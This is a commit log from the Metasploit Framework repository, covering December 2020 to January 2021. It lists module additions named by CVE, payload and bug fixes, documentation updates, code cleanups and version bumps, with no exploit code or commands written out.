Spencer McIntyre 0bc05ae2e8 Land #14606, Add banner celebrating the awesome teams who joined us in the 2020 ctf 2021-01-13 10:53:57 -05:00
Spencer McIntyre 7936ce8b5e Update the documentation with additional information 2021-01-13 09:53:10 -05:00
dwelch-r7 2578d824db Fix bug where vhost wasn't being set correctly when using rhost http url 2021-01-13 14:41:45 +00:00
dwelch-r7 ec59202d2e Land #14605, Automatically set the VHOST datastore option for modules
Update the VHOST datastore option for modules
2021-01-13 13:13:46 +00:00
Spencer McIntyre f5b5624b81 Update Exchange DLP check method, add authors and a source 2021-01-12 18:00:27 -05:00
Spencer McIntyre 652e4eaf60 Update the exchange ECP DLP Policy exploit for the latest bypass 2021-01-12 17:45:09 -05:00
Metasploit 28322a83f0 automatic module_metadata_base.json update 2021-01-12 16:17:11 -06:00
Grant Willcox 6fc4518625 Land #14600, Refactor and document some of the FileSystem mixin methods 2021-01-12 16:10:23 -06:00
Spencer McIntyre ab50715cd2 Make additional clarifications in the file system mixin documentation 2021-01-12 16:13:39 -05:00
bwatters d8e68e6487 Specify you must be SYSTEM for dll removal in docs and removed unused variable in the module 2021-01-12 11:45:53 -06:00
Spencer McIntyre 95e4ae77b1 Remove a reference to an undefined var and consistently return a boolean 2021-01-12 09:09:20 -05:00
Metasploit 560382d038 automatic module_metadata_base.json update 2021-01-11 16:23:00 -06:00
Spencer McIntyre 33bd712e0a Land #14585, Create module for CVE-2020-17136: Cloud Filter Arbitrary File Creation EoP 2021-01-11 17:16:40 -05:00
bwatters 50e115b414 Cleanup and edits per review from Christophe
Removed unused method from ps script
Cleaned up some code in the module
Added removal instructions to the documentation
2021-01-11 16:02:58 -06:00
Metasploit 77819f31c0 automatic module_metadata_base.json update 2021-01-11 15:43:55 -06:00
Shelby Pace 7aef731267 Land #14572, add AIT CSV import rce 2021-01-11 15:37:05 -06:00
bwatters b4a8f364b3 Add banner celebrating the awesome teams who joined us in the 2020
Metasploit CTF.  (Except the one team with an F-bomb in it)
2021-01-11 11:09:38 -06:00
Spencer McIntyre a9804727d5 Update the VHOST datastore option for modules
This fixes handling the VHOST datastore option for modules that use the
HTTP Client mixin whereby the IP address was being used since RHOSTS is
resolved.
2021-01-11 10:31:36 -05:00
Andrey Arapov 5ec5db828e gather/external_ip: set Host header
http://ifconfig.me replies with 404 when Host header isn't set.
2021-01-11 15:59:57 +01:00
dwelch-r7 f6ac832b47 Land #14604, Remove travis config files
Remove travis config files
2021-01-11 12:07:17 +00:00
dwelch-r7 18765d1551 Land #14562, Map Meterpreter command IDs to their names when raising a RequestError
Map Meterpreter command IDs to their names when raising a RequestError
2021-01-11 12:00:50 +00:00
Alan Foster 714db8bf43 Remove travis config files 2021-01-11 10:28:14 +00:00
k0pak4 bdc70869ee Update documentation to include passwords and clean up password work 2021-01-09 20:34:39 -05:00
kalba-security 6c14f57057 Use Rex::Parser::Arguments to process options and arguments, change '-D' delete file to '-c' for clearing the contents, change helper method names, add helper method 'favorite_check_fav_modules' 2021-01-09 13:01:33 -05:00
k0pak4 0cb1e16c8b Convert to full login scanner 2021-01-09 12:10:06 -05:00
h00die bcbb1d4573 updated sql for more stealth 2021-01-09 09:10:20 -05:00
Niboucha Redouane 82874a5cf5 fix hex_encode_strings, encode empty strings before others (""||"a" would otherwise encode "||" before getting to empty strings) 2021-01-09 14:15:05 +01:00
h00die 7d7263cf1f spelling 2021-01-09 08:13:19 -05:00
Niboucha Redouane e63dd77b52 Handle empty strings when hex_encode_strings is true 2021-01-09 14:01:32 +01:00
Niboucha Redouane b9d9a8af5b Fix MySQLi timebasedblind output length detection 2021-01-09 14:00:25 +01:00
Pedro Ribeiro badcf2e154 Merge pull request #25 from rapid7/master
sasas
2021-01-09 13:26:16 +07:00
Spencer McIntyre a7b65635f9 Add an alias for the junction methods 2021-01-08 18:41:05 -05:00
Spencer McIntyre 829bacbef6 Refactor and document some of the FileSystem mixin methods 2021-01-08 16:10:36 -05:00
Grant Willcox cc686eeac2 Land #14595, Update rex-exploitation gem from 0.1.25 to 0.1.26 2021-01-08 13:03:29 -06:00
Grant Willcox 3072391d00 Make second round of review edits to fix Spencer's comments 2021-01-08 12:50:52 -06:00
Metasploit 1f9fc50a38 automatic module_metadata_base.json update 2021-01-08 10:05:20 -06:00
Christophe De La Fuente 2886ee0448 Land #14582, Support command actions for post modules and consolidate VSS modules 2021-01-08 16:54:04 +01:00
Andrey Arapov b641e25b6d docker: hassle-free DB bootstrap
While it is recommended to use `POSTGRES_PASSWORD`, I think it's good when we
can bring MSF up with minimum effort from scratch.

It shouldn't be an issue from the security point of view having the DB running
in a docker container with the 5432/tcp port available only to the MSF.
2021-01-08 16:20:11 +01:00
Stuart.Morgan e82b5a15fe rubocop 2021-01-08 14:32:18 +00:00
Stuart.Morgan 4215339d34 Added checks for orphaned accounts and fixed a bug around CSV generation 2021-01-08 14:31:31 +00:00
Metasploit 25aecc8bb3 automatic module_metadata_base.json update 2021-01-08 07:45:03 -06:00
Christophe De La Fuente 6092fa32ae Land #14515, fix reverse_awk and bind_awk exit behavior 2021-01-08 14:37:38 +01:00
k0pak4 2d0571e037 Add valid usernames to the database as new credentials 2021-01-08 07:22:36 -05:00
dwelch-r7 51140abd94 Bump rex-exploitation gem from 0.1.25 to 0.1.26 2021-01-08 11:55:43 +00:00
Grant Willcox d5bb36c530 Fix up code to use built in cd() and mkdir() commands, and adjust code to not overwrite datastore hash. Also use service_hash over manually starting the service. 2021-01-07 17:39:30 -06:00
bwatters 7d81b4826d Update credits 2021-01-07 16:30:19 -06:00
Metasploit bb1257e344 automatic module_metadata_base.json update 2021-01-07 15:55:35 -06:00
Shelby Pace 458c87556d Land #14590, fix typos in webmin_show_cgi_exec 2021-01-07 15:48:11 -06:00
Stuart.Morgan 535403bc30 rubocop 2021-01-07 21:02:04 +00:00
Stuart.Morgan 48a2745c84 documented 2021-01-07 20:47:24 +00:00
Stuart.Morgan 67d64f1e46 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into stufus_enum_onedrive 2021-01-07 20:35:37 +00:00
Stuart.Morgan 1cd21b5780 msftidy 2021-01-07 20:34:30 +00:00
Stuart.Morgan 589395989f fixed bug with multiple teamsites & improved formatting 2021-01-07 20:32:53 +00:00
Spencer McIntyre 10b4c7b4da Fix a command precedence and parsing extra options 2021-01-07 15:16:40 -05:00
Spencer McIntyre 104a9575d8 Use a regex to perform a check on the DEVICE option 2021-01-07 15:02:46 -05:00
Stuart.Morgan 79f6a098c8 save results into csv loot 2021-01-07 20:00:42 +00:00
Stuart.Morgan 1db79fc633 Tidied up business/personal discriminator 2021-01-07 19:34:11 +00:00
Stuart.Morgan b6cb636d20 Tidied up, presenting results 2021-01-07 19:24:56 +00:00
Stuart.Morgan 88ca57d8a0 passed msftidy 2021-01-07 18:58:50 +00:00
Stuart.Morgan 9ee46adde5 removed redundant code 2021-01-07 18:57:41 +00:00
Stuart.Morgan a7d72bd55e Obtains information correctly 2021-01-07 18:54:30 +00:00
Stuart.Morgan cc81a67b92 Obtain the initial endpoint mapping 2021-01-07 18:19:53 +00:00
Metasploit a01d58d72f Bump version of framework to 6.0.26 2021-01-07 12:04:47 -06:00
Stuart.Morgan 321ff52e2d Using my putty module as a template 2021-01-07 17:42:28 +00:00
Spencer McIntyre fc7953c50e Use super in #method_missing for future mixins 2021-01-07 12:05:59 -05:00
dwelch-r7 a5cfa5175e Match against more specific error messages 2021-01-07 16:29:41 +00:00
adfoster-r7 b4e8827b90 Land #14589, Bump metasploit-payload gem to fix the broken download command on android 2021-01-07 10:58:16 +00:00
Anurag Mondal 2465c6ca0f Update webmin_show_cgi_exec.rb
Fixed some typos.
2021-01-07 15:05:53 +05:30
bwatters 5e5d7b1abb Update to execute_string to avoid the issue where an arbitrary
length comment is required for the exploit to work.
2021-01-06 17:08:22 -06:00
Tim W 99d7336314 fix #14526, fix #14534, fix #14535, fix #14546, bump metasploit-payloads to 2.0.26 2021-01-06 21:07:24 +00:00
Grant Willcox 3e52debd8b Update the exploit a bit more to remove excess options and also update the documentation accordingly. 2021-01-06 12:16:06 -06:00
Grant Willcox 5262e16694 Make adjustments since the exploit can currently only target x64 systems 2021-01-06 11:40:02 -06:00
Metasploit 811b38bb68 automatic module_metadata_base.json update 2021-01-06 09:17:54 -06:00
Christophe De La Fuente 17c393f101 Land #14046, Adding juicypotato-like privilege escalation exploit for windows 2021-01-06 16:02:05 +01:00
Christophe De La Fuente bf7627b33e Adding DLL's 2021-01-06 15:59:08 +01:00
dwelch-r7 a19575d6bb New lines and undoing debug changes 2021-01-06 12:48:16 +00:00
dwelch-r7 3b827b0edc Add explicit requires for some rex/logging stuff 2021-01-06 11:49:51 +00:00
dwelch-r7 992bcbfac4 Add coverage for other nmap scans which require root 2021-01-06 11:14:29 +00:00
dwelch-r7 c11f6b61a3 Eagerly require msf/core for namespacing reasons 2021-01-06 10:22:51 +00:00
Grant Willcox 863417fca7 Second round of updates and some rubocop changes to conform to standards. 2021-01-06 01:30:40 -06:00
Grant Willcox 81ee149ea2 Add check code support to module and update the documentation accordingly, plus rework the module description 2021-01-06 01:06:08 -06:00
Grant Willcox 839daf93e9 Update the compiled DLL and redo a lot of the module to get it into its first ready state using a different DLL hijack I found during research 2021-01-05 16:12:08 -06:00
Metasploit 10e397219b automatic module_metadata_base.json update 2021-01-05 14:10:05 -06:00
Shelby Pace 7cab5568ab Land #14568, add total upkeep backup download 2021-01-05 14:01:04 -06:00
dwelch-r7 7c063404eb Fix missing constants in msfvenom 2021-01-05 16:42:59 +00:00
dwelch-r7 c0912b358c Fix tests 2021-01-05 16:20:42 +00:00
dwelch-r7 ad9763763d formatting fixes 2021-01-05 15:10:23 +00:00
dwelch-r7 bad5ccbc49 Remove msf/base requires 2021-01-05 14:59:46 +00:00
dwelch-r7 0a87386c49 Add base folder to autoloader 2021-01-05 13:07:53 +00:00
dwelch-r7 0d29b8d66c Add check for nmap requiring sudo permissions 2021-01-05 11:39:43 +00:00
Metasploit 5dd6d1b4b2 automatic module_metadata_base.json update 2021-01-04 12:21:41 -06:00
Grant Willcox b916789041 Add in source for the compiled exploit 2021-01-04 12:17:52 -06:00
bwatters 54f5e565fa Land #14330, SpamTitan Gateway Remote Code Execution
Merge branch 'land-14330' into upstream-master
2021-01-04 12:14:12 -06:00
Grant Willcox 668eeae4e1 Initial push of code 2021-01-04 12:04:38 -06:00
Metasploit d8a1d39149 automatic module_metadata_base.json update 2021-01-04 11:57:16 -06:00
Shelby Pace 9e41dfec62 Land #14334, close socket in x86 bind payloads 2021-01-04 11:50:07 -06:00
Spencer McIntyre 6ac9cb7c0e Apply rubocop changes for the new VSS module 2021-01-04 12:26:36 -05:00
Spencer McIntyre 2f58d246e7 Add documentation for the new VSS module 2021-01-04 12:25:41 -05:00
Spencer McIntyre 2b1ac98eba Deprecate all of the old vss_* modules in favor of the new unified one 2021-01-04 10:54:42 -05:00
Spencer McIntyre fd2a752052 Add the VSS_UNMOUNT action and use the win32 API instead of a command 2021-01-04 10:45:41 -05:00
Spencer McIntyre 088c49aa00 Add two more railgun definitions for kernel32 2021-01-04 10:45:07 -05:00
Metasploit c1a08b14d2 automatic module_metadata_base.json update 2021-01-04 08:56:00 -06:00
Grant Willcox 5cf6e5da70 Land #14566, Remove the deprecated SOCKS modules in favor of the new unified one 2021-01-04 08:48:50 -06:00
dwelch-r7 fe9daee48b Land #14579, Update issue link in readme
Update issue link in readme
2021-01-04 13:16:19 +00:00
Alan Foster a9eadbe75c Update issue link in readme 2021-01-04 12:06:27 +00:00
h00die d34166ebe1 randomize 2021-01-03 17:36:54 -05:00
h00die 73b515707e abandoned cart sqli 2021-01-03 17:15:17 -05:00
h00die 97947062b2 standardize language 2021-01-03 16:25:39 -05:00
h00die e2a605de19 add sqlmap reference 2021-01-03 16:20:58 -05:00
h00die 41aff572c0 chopslider 2021-01-02 14:19:30 -05:00
h00die d8c55501a5 ait csv improter exploit 2021-01-01 12:14:52 -05:00
Metasploit a4a7efddb7 Bump version of framework to 6.0.25 2020-12-31 12:12:36 -06:00
h00die c64d0038ab review step 1 2020-12-31 12:54:33 -05:00
RAMELLA Sébastien 338e277303 fix. some rubocop recommendations 2020-12-31 14:42:06 +04:00
h00die ff3dd7b73a first go of wp_total_upkeep 2020-12-30 16:34:12 -05:00
Spencer McIntyre 88f5fada50 Initial unified VSS module 2020-12-29 17:48:17 -05:00
Spencer McIntyre fc8312f1aa Fix a bug that occurs when the action is invalid 2020-12-29 17:25:02 -05:00
Spencer McIntyre 11ca76cacc Support post actions as commands too 2020-12-29 16:54:09 -05:00
Spencer McIntyre 2f979757e3 Refactor the action commands dispatching logic into a nice mixin 2020-12-29 14:59:06 -05:00
Spencer McIntyre 8701a2e6e8 Remove the deprecated SOCKS modules in favor of the new unified one 2020-12-29 13:33:06 -05:00
Spencer McIntyre f5359ba693 Fix the exception that is rescued 2020-12-28 15:43:14 -05:00
Spencer McIntyre a0b26429a6 Map Meterpreter command IDs to their names when raising a RequestError 2020-12-28 15:34:00 -05:00
Metasploit 2af64c43e9 Bump version of framework to 6.0.24 2020-12-24 12:02:49 -06:00
k0pak4 f78a66e9f7 Pylint main module 2020-12-23 13:35:00 -05:00
k0pak4 fcf0a3fc65 Update documentation to be msftidy 2020-12-23 13:22:58 -05:00
Metasploit e4de7ba28f automatic module_metadata_base.json update 2020-12-23 11:47:29 -06:00
Grant Willcox 7de662c807 Land #14521, Struts2 Multi Eval OGNL RCE 2020-12-23 11:40:16 -06:00
Metasploit 7de32d353b automatic module_metadata_base.json update 2020-12-23 11:18:42 -06:00
Grant Willcox 5565b231c0 Land #14542, Linguistic fixes of 'does not exists' 2020-12-23 11:11:39 -06:00
k0pak4 ea28e9d71d Add version info to documentation 2020-12-23 12:02:06 -05:00
k0pak4 9ac75e492e Add documentation and clean up 2020-12-23 11:59:47 -05:00
Grant Willcox 70f8ff31f8 Update documentation to include missing extra options I forgot to document, edit the wording on the module to match the documentation, and do final touch ups. 2020-12-23 10:50:22 -06:00
k0pak4 e351dc0d2c Make use of existing RHOSTS 2020-12-23 11:46:19 -05:00
k0pak4 2c03ed7854 Add username text file option 2020-12-23 11:23:52 -05:00
k0pak4 4488688d61 Add AD Domain Discovery to module 2020-12-23 10:49:02 -05:00
k0pak4 60c60d7b12 First working version of the module, single username enumeration 2020-12-23 00:51:11 -05:00
k0pak4 0c2411f064 First pass at RDP Web Client module that can enumerate usernames against a domain 2020-12-22 23:34:52 -05:00
CSharperMantle d99c2ac783 linguistic fixes of 'does not exists' 2020-12-23 11:36:38 +08:00
Grant Willcox 8a932b847a Apply RuboCop edits 2020-12-22 17:57:38 -06:00
Grant Willcox 799b451324 Add in updates to documentation to fix spelling mistakes and to also add in missing documentation for some options, plus to make some explanations a bit clearer. 2020-12-22 17:33:40 -06:00
Metasploit 25da38c899 automatic module_metadata_base.json update 2020-12-22 14:58:47 -06:00
Shelby Pace 6958f18e52 Land #14532, fix cmd_exec error in android capture 2020-12-22 14:51:54 -06:00
bwatters d2ca5d331d Add documentation 2020-12-22 14:14:20 -06:00
Metasploit 5e070cb6ff automatic module_metadata_base.json update 2020-12-22 09:34:39 -06:00
Grant Willcox 4a449f97d3 Land #14522, Replace hard-coded Shiro default key with ENC_KEY 2020-12-22 09:26:49 -06:00
Grant Willcox 7d0cb771a5 Apply RuboCop updates to module. 2020-12-21 17:31:24 -06:00
Grant Willcox 24e8aeffe5 Incorporate review feedback and update the associated documentation. 2020-12-21 17:29:21 -06:00
Metasploit ba3dd8d174 automatic module_metadata_base.json update 2020-12-21 16:05:58 -06:00
Grant Willcox 2c66beac17 Land #14429, Create shodan_host.rb, a module to grab ports from a given IP using Shodan 2020-12-21 15:58:17 -06:00
Grant Willcox 12277d3020 Apply RuboCop changes to the exploit module and also make final adjustments to the exploit code to handle some edge cases and fix review comments 2020-12-21 15:26:48 -06:00
Grant Willcox 92d40122ed Land #14537, Update LICENSE file to use https links for the format and source field values 2020-12-21 13:42:26 -06:00
Grant Willcox b717278af8 Land #14538, Typo fix for error logged in import 2020-12-21 13:35:38 -06:00
Matthew Kienow 8e1f30cc16 Update source URL to https 2020-12-21 11:22:09 -05:00
Jeffrey Martin ca0deec2c1 typo fix for error logged in import
`print_error` is not commonly used in import classes, this may not
be the best solution, however the typo needs to be addressed.
2020-12-21 10:21:38 -06:00
Matthew Kienow f31674204f Update to https format specification 2020-12-21 11:14:28 -05:00
Brendan Coles 87a80afeb7 post/android/capture/screen: Use Msf::Post::Common mixin 2020-12-20 11:17:39 +00:00
William Vu 9999dfcd8c Land #14531, pam_username_bof module doc fix 2020-12-18 21:35:03 -06:00
William Vu 39110d04f0 Add note about needing an Oracle account 2020-12-18 21:20:29 -06:00
William Vu 4d85602fae Fix incorrect scenario header in module doc
I retested in VirtualBox and updated the output but not the header.
2020-12-18 21:15:05 -06:00
C4ssandre 57c57a398d Adding new check to filter out Windows 7 and Windows XP. Indeed, lab experiments has shown that BITS does not attempt to connect to WinRM port, making those systems not vulnerable. 2020-12-19 02:51:48 +01:00
adfoster-r7 ce48e38158 Land #14530, fix failing test on macOS caused by IPv6 vs IPv4 result precedence 2020-12-19 00:53:36 +00:00
Jeffrey Martin 377a64f8ab do not test iface in macOS for IPv6 inconsistency 2020-12-18 16:58:18 -06:00
Metasploit 1a989d6f18 automatic module_metadata_base.json update 2020-12-18 16:18:46 -06:00
Spencer McIntyre 11faafa4e9 Land #14474, Wordpress 2-day: easy-wp-smtp arbitrary wordpress user password reset 2020-12-18 17:07:46 -05:00
Spencer McIntyre 764efbeac3 Fixup a typo, an unnecessary statement and clarify a statement 2020-12-18 17:07:16 -05:00
h00die 3cb39c2fca Land #14497, wordpress uplicator plugin arbitrary file read 2020-12-18 17:05:40 -05:00
Metasploit f642254899 automatic module_metadata_base.json update 2020-12-18 14:58:07 -06:00
Christophe De La Fuente dc6b67f4c6 Land #14509, Fixes for Solr RCE 2020-12-18 21:51:06 +01:00
h00die bee11c7d6e add cve 2020-12-18 15:32:35 -05:00
h00die 9e6d20a83c create aggressive mode and some review 2020-12-18 15:30:45 -05:00
Metasploit ff50997595 automatic module_metadata_base.json update 2020-12-18 10:56:26 -06:00
adfoster-r7 28bcad82c8 Land #14528, Note that Meterpreter now requires Windows XP SP2 or newer 2020-12-18 16:50:34 +00:00
cgranleese-r7 0433700a01 Land #14444, Adds in a couple of missing methods from the remote data services for adding/deleting routes 2020-12-18 14:41:21 +00:00
cgranleese-r7 f76d1ac0e5 Land #14475, Refactor of where and when the EICAR canary is checked 2020-12-18 11:35:14 +00:00
dwelch-r7 450193ed6a Send sessions records instead of IDs 2020-12-18 11:00:55 +00:00
dwelch-r7 390b08d3d8 Fix namespacing for Route servlet 2020-12-18 11:00:55 +00:00
dwelch-r7 f4e0278125 Add remote data service support for autoroute 2020-12-18 11:00:55 +00:00
RAMELLA Sébastien 0e07269c3f change parsing method 2020-12-18 11:31:52 +04:00
Metasploit 2840a749ea automatic module_metadata_base.json update 2020-12-17 16:50:44 -06:00
Spencer McIntyre 9b8b4621df Land #14368, Pulse Connect Secure gzip RCE: cve-2020-8260 2020-12-17 17:43:55 -05:00
h00die e4a3cd630d Merge pull request #16 from zeroSteiner/feat/mod/pulse-gzip
Rewrite CVE-2020-8260 in Ruby
2020-12-17 17:00:07 -05:00
Spencer McIntyre 43b1497cf6 Remove some debug info and mark bind payloads as being incompatible 2020-12-17 16:36:20 -05:00
Metasploit 7d95ea10aa automatic module_metadata_base.json update 2020-12-17 15:20:09 -06:00
Shelby Pace 4fb8cc06c0 Land #14517, capture stderr and use metasm 2020-12-17 15:13:44 -06:00
Spencer McIntyre 900c4367ec Note that Meterpreter now requires Windows XP SP2 or newer 2020-12-17 14:32:28 -05:00
Metasploit f1af305f84 Bump version of framework to 6.0.23 2020-12-17 12:10:21 -06:00
Metasploit 07425b0b14 automatic module_metadata_base.json update 2020-12-17 10:49:21 -06:00
adfoster-r7 e7ad339523 Land #14525, Eagerly load hrr_rb_ssh within reverse_ssh module 2020-12-17 16:42:51 +00:00
SunCSR Team abaf0b4bf2 Merge pull request #1 from h00die/landing-14497
rubocop and minor adjustments
2020-12-17 19:53:14 +07:00
h00die a1702e8b53 rubocop and minor adjustments 2020-12-17 06:39:43 -05:00
James Lee be3a1eb9d6 Guard against empty response 2020-12-16 18:25:17 -06:00
Metasploit c8d96f09b4 automatic module_metadata_base.json update 2020-12-16 15:08:38 -06:00
Spencer McIntyre 87dacce2cd Land #14446, Add Oracle Solaris SunSSH PAM parse_user_name() exploit (CVE-2020-14871) 2020-12-16 16:01:32 -05:00
bwatters 222d510e44 Rubocop fixes 2020-12-16 13:59:47 -06:00
bwatters 7f4fac4548 Fix powershell issues and add comment because it is apparently magic 2020-12-16 13:57:02 -06:00
Shelby Pace c21b20acf4 Land #14472, replace hard-coded port with rport 2020-12-16 12:49:23 -06:00
Alan Foster 00109a68be Eagerly load hrr_rb_ssh within reverse_ssh module 2020-12-16 16:55:15 +00:00
RAMELLA Sébastien 08e9d0bea2 update module documentation 2020-12-16 19:43:45 +04:00
RAMELLA Sébastien 7e99025dd3 fix. remove call to eval and some minor change 2020-12-16 19:36:32 +04:00
Christophe De La Fuente c586bde50d Update documentation to add SNMPPORT option description 2020-12-16 15:20:10 +01:00
Christophe De La Fuente afea5cd74e Use opts['RHOST'] and opts['RPORT'] to creating the SNMP::Manager instance in connect_snmp 2020-12-16 15:15:27 +01:00
Christophe De La Fuente a939704f9d Add an SNMPPORT options 2020-12-16 15:15:27 +01:00
Christophe De La Fuente 60bcc95edc Fix documentation 2020-12-16 15:15:27 +01:00
Christophe De La Fuente a6102bd8ac Make rubocop happy 2020-12-16 15:15:27 +01:00
Christophe De La Fuente 298deae709 Add documentation 2020-12-16 15:15:27 +01:00
Christophe De La Fuente 99d3f66271 Add authentication and refactor 2020-12-16 15:15:27 +01:00
Christophe De La Fuente 08f051e959 Apply rubocop 2020-12-16 15:15:27 +01:00
Christophe De La Fuente 56560c901b Add SpamTitan RCE module 2020-12-16 15:15:26 +01:00
adfoster-r7 61dec1b3e7 Land #14499, Replace self with the explicit Module name In AuthServlet lambdas 2020-12-16 11:49:12 +00:00
Natto e4678b82c5 Update shodan_host.rb 2020-12-16 19:39:43 +08:00
RAMELLA Sébastien 483282b05e fix. spelling typo 2020-12-16 09:01:33 +04:00
kai 9be1e8c295 replace hard-coded shiro default key with SHIROKEY 2020-12-16 11:03:30 +08:00
Spencer McIntyre 941ba923f7 Add missing module notes 2020-12-15 19:58:04 -05:00
Spencer McIntyre 3d7ed70cec Tweak the check method and add module docs 2020-12-15 19:49:29 -05:00
Spencer McIntyre 289605f532 Require that the user know the CVE since the check is questionable 2020-12-15 19:17:35 -05:00
kalba-security ba6dd776f3 Separate logic for adding and deleting favorite modules into separate functions; improve syntax and error handling 2020-12-15 12:22:35 -05:00
RAMELLA Sébastien e3178c48c4 add. fortios path traversal (cve-2018-13379) 2020-12-15 19:09:37 +04:00
Spencer McIntyre 9bdf591a98 Add a working command stager for CVE-2020-17530 2020-12-15 09:13:06 -05:00
Spencer McIntyre 7826cbb8de Initial addition of the Struts2 Double Eval exploit 2020-12-15 09:13:06 -05:00
Spencer McIntyre 246c455c96 Reformat the struts2_namespace_ognl module docs 2020-12-15 09:13:06 -05:00
Metasploit 1bf2d4d3e0 automatic module_metadata_base.json update 2020-12-15 06:15:09 -06:00
Christophe De La Fuente fab7d97fc8 Land #14435 - Add CVE-2020-1054, win32k DrawIconEx OOB Write LPE 2020-12-15 12:55:55 +01:00
Christophe De La Fuente 33ef352f89 Add dll
Compiled with Visual Studio Express 2013 with Platform Toolset v120
2020-12-15 12:42:06 +01:00
Natto fc96ae0583 Create shodan_host.md 2020-12-15 10:30:58 +08:00
Tim W 8c7bffa229 fix #14516, fix stderr output in osx/x64/shell_reverse_tcp 2020-12-15 00:05:42 +00:00
Tim W bc4dc2df15 convert osx/x64/shell_reverse_tcp to Metasm 2020-12-15 00:04:05 +00:00
Jeffrey Martin 1a8911e934 Land #14495, Add github actions for testing 2020-12-14 12:18:13 -06:00
Tim W c7ca0e4ef5 Fix #14510, fix reverse_awk and bind_awk exit behavior 2020-12-14 17:10:07 +00:00
Tim W fd36ac6e24 convert bind_awk and reverse_awk payloads to squiggly heredoc 2020-12-14 16:09:10 +00:00
dwelch-r7 06fab92329 Remove dead link 2020-12-14 15:20:15 +00:00
Tim W 9c47803609 increase wfsdelay 2020-12-14 14:54:54 +00:00
Tim W 7af996ae4c add offsets 2020-12-14 14:54:54 +00:00
Tim 69a26bfb6c fix external/source/exploits/CVE-2020-1054/dllmain.cpp placeholder
Co-authored-by: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
2020-12-14 14:54:54 +00:00
Tim W a30cdfc892 Fix #14254, Add CVE-2020-1054, win32k DrawIconEx OOB Write LPE 2020-12-14 14:54:54 +00:00
Metasploit fc701733f9 automatic module_metadata_base.json update 2020-12-14 08:25:59 -06:00
Spencer McIntyre 5e84dfec15 Land #14500, fix railgun file_version and add test 2020-12-14 09:16:14 -05:00
Christophe De La Fuente 98d6364248 Land #14482, Use CVE-2020-5752 path traversal bypass for CVE-2019-3999 2020-12-14 15:10:09 +01:00
Natto 45a9609fc8 Update shodan_host.rb 2020-12-14 17:47:50 +08:00
Natto 51fd4033e8 Update shodan_host.rb 2020-12-14 17:45:19 +08:00
Natto 8126ec4cb5 Update shodan_host.rb 2020-12-14 16:39:15 +08:00
SunCSR Team 910463b492 Update wp_duplicator_file_read.md 2020-12-13 21:13:33 -05:00
SunCSR Team 65be04ebf9 Update wp_duplicator_file_read.rb 2020-12-13 21:07:21 -05:00
SunCSR Team 3dcd963c9a Update wp_duplicator_file_read.rb 2020-12-13 21:05:34 -05:00
James Lee f255724e01 Changes to support older Solr (tested 5.3.0)
Use a new parameter instead of a header because older versions don't
have access to the request object.

There was an issue where the exploit would fail if the exec returned -1
despite the payload otherwise working, fixed by not trying to return
output in that case.

Also updates the documentation to reflect that we have a Java target now
and quoting is no longer a concern.
2020-12-13 19:05:47 -06:00
SunCSR Team 64f597a43a Update wp_duplicator_file_read.rb 2020-12-12 23:44:50 +07:00
SunCSR Team cbc99363e9 Update wp_duplicator_file_read.md 2020-12-12 22:55:44 +07:00
SunCSR Team 5fc8bb1d7b Update wp_duplicator_file_read.rb 2020-12-12 21:39:59 +07:00
SunCSR Team d35d5f1061 Update wp_duplicator_file_read.md 2020-12-12 21:30:56 +07:00
adfoster-r7 7b31d332dc Land #13234, add beSECURE integration 2020-12-12 00:05:00 +00:00
William Vu ba125c1c64 Merge remote-tracking branch 'upstream/master' into feature/solaris 2020-12-11 14:25:05 -06:00
Jeffrey Martin eb675738ff Land #14476, Cygwin SSH Windows Identification 2020-12-11 12:57:00 -06:00
adfoster-r7 5d693e53c0 Land #14501, Add additional label exemptions to stale bot - feature, enhancement, library 2020-12-11 16:04:59 +00:00
dwelch-r7 eb5241d1e3 Make feature, enhancement, library label exemptions 2020-12-11 15:40:13 +00:00
Tim W 7db96aba68 actually fix railgun file_version 2020-12-11 15:26:06 +00:00
Tim W cef120b0cd fix railgun file_version and add test 2020-12-11 15:08:19 +00:00
dwelch-r7 fb638e909a Replace self with the explicit Module name 2020-12-11 11:44:39 +00:00
C4ssandre 0e581759f5 Updating license. 2020-12-11 05:30:10 -05:00
C4ssandre 1fec224bae Adding a new check raised by an unforeseen usecase. I tested the usecase of a webserver on which a malicious user succeeded to upload a meterpreter .exe and execute it by calling its url. The meterpreter sessions belongs to IUSRS, which is not allowed to enumerate services. Thus the exploit fails, but checks pass. So added new checks for filtering this usecase. 2020-12-11 05:22:37 -05:00
C4ssandre e02451fe13 Fixing mistake in doc. 2020-12-11 04:53:37 -05:00
C4ssandre 9c9e8929af Adding a scenario. 2020-12-11 04:50:53 -05:00
C4ssandre d1956199aa Updating a warning message. 2020-12-11 03:58:14 -05:00
C4ssandre 53a12a7984 Updating doc. 2020-12-11 03:53:25 -05:00
SunCSR Team 477c09a7ed Create wp_duplicator_file_read.md
Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download
2020-12-11 01:15:52 -05:00
SunCSR Team 8ede2be299 Add module wp_duplicator_file_read.rb
Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download
2020-12-10 23:40:32 -05:00
SunCSR Team 4b3a5fa2c8 Delete wp_duplicator_file_read.rb 2020-12-10 23:39:38 -05:00
SunCSR Team ee541a31ae Add files via upload
Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download
2020-12-10 23:37:32 -05:00
Alan Foster 3fd028b43d Add github actions for testing 2020-12-10 19:02:16 +00:00
Metasploit 8aaae387ea Bump version of framework to 6.0.22 2020-12-10 12:11:43 -06:00
dwelch-r7 ee32393b41 Address code review comments 2020-12-10 17:24:30 +00:00
Metasploit e586bb04cf automatic module_metadata_base.json update 2020-12-10 11:14:31 -06:00
Shelby Pace 83943adf8b Land #14466, add Aerospike UDF rce 2020-12-10 11:07:56 -06:00
adfoster-r7 34cc179b04 Land #14481, Add a require for command_shell_options to fix intermittent test failures 2020-12-10 16:53:40 +00:00
dwelch-r7 acacf443a8 Land #14453, Add puma to gemspec
Add puma to gemspec
2020-12-10 16:11:10 +00:00
dwelch-r7 54b897ea44 Land #14431, Add configurable logging to the console and support stdout sinks
Add configurable logging to the console and support stdout sinks
2020-12-10 16:09:42 +00:00
Spencer McIntyre de274b034b Land #14477, force active record object load 2020-12-10 10:47:47 -05:00
Brendan Coles a9e231ad0a Use CVE-2020-5752 path traversal bypass for CVE-2019-3999 2020-12-10 12:14:47 +00:00
dwelch-r7 3a94d4f7ee Add a require for command shell options to fix randomly failing tests
Temporary until we zeitwerk more things
